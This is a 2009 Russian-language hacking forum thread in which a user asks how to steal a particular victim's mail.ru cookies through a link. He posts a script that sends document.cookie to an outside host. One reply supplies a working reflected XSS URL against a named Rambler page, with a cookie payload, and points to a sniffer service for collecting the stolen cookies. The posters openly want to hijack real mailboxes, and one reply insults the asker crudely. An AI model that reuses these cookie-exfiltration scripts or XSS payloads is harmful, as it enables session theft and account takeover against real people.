HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Кража куки через клик по ссылке
  #1  
Старый 04.05.2009, 21:25
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами: 8965761

Репутация: 6
Smile Кража куки через клик по ссылке

если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки
Код HTML:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и жертва откроет по ссылке ету страницу, то у меня будут куки или нет?
ЗЫ: пишем те, кто уже точно знает!
 
Ответить с цитированием

  #2  
Старый 04.05.2009, 21:27
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами: 9157119

Репутация: 74
По умолчанию

В общем случае куки можно получить только в рамках одного домена.
 
Ответить с цитированием

  #3  
Старый 04.05.2009, 21:38
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами: 8965761

Репутация: 6
Smile

смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!
 
Ответить с цитированием

  #4  
Старый 04.05.2009, 21:44
pento
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
С нами: 10449962

Репутация: 66
По умолчанию

не будут
 
Ответить с цитированием

  #5  
Старый 04.05.2009, 21:46
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами: 8965761

Репутация: 6
Smile

так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!
 
Ответить с цитированием

  #6  
Старый 04.05.2009, 21:59
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Ты, видимо, не понимаешь, что куки без xss не своруешь.
 
Ответить с цитированием

  #7  
Старый 04.05.2009, 22:02
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами: 8965761

Репутация: 6
Smile

та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!
 
Ответить с цитированием

  #8  
Старый 14.06.2009, 03:33
DIMON4G
Участник форума
Регистрация: 25.05.2008
Сообщений: 201
С нами: 9453915

Репутация: 296
По умолчанию

Цитата:
Сообщение от LemoTTT  
та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!
долбаёп, хсс нужны, без них никак
вот пример на рамблере
Код:
http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert(document.cookie)</script>
alert(document.cookie) - это значит, чтобы мы увидили куки, ну и осталось тока сделать, чтобы они записывалисы в снифер, вот нормальный http://kanick.ru/sniffer/
p.s. удачи в хеке и почитай вот это http://forum.antichat.ru/thread20140.html

Последний раз редактировалось DIMON4G; 14.06.2009 в 03:38..
 
Ответить с цитированием

  #9  
Старый 04.05.2009, 22:28
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Бред говоришь ты.
У тебя есть колеса - этот скрипт. Но нет двигателя XSS
Как ты без двигателя толкнешь колеса?
Да никак.
Xss и используется, чтобы сookie своровать.
 
Ответить с цитированием

  #10  
Старый 04.05.2009, 22:40
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
С нами: 8965761

Репутация: 6
Smile

ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Active Perl через проксю Elekt Анонимность 7 10.03.2008 22:14
через xss куки на снифер LeopardSS Уязвимости Mail-сервис 1 20.01.2006 21:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.